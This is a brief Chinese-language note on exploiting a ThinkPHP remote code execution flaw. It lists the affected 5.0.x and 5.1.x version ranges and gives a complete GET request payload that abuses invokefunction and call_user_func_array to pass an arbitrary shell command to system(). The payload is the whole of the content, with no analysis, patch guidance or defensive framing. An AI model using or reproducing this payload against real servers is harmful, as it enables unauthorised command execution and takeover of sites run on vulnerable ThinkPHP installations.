【笔记】ThinkPHP远程代码执行漏洞利用

前言

ThinkPHP远程代码执行漏洞利用

漏洞利用前提

• 5.0.7 <= ThinkPHP <= 5.0.22
• 5.1.0 <= ThinkPHP <= 5.1.30

漏洞利用

<shell>：远程执行的Shell命令

request

GET http://127.0.0.1:80/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=<shell>

完成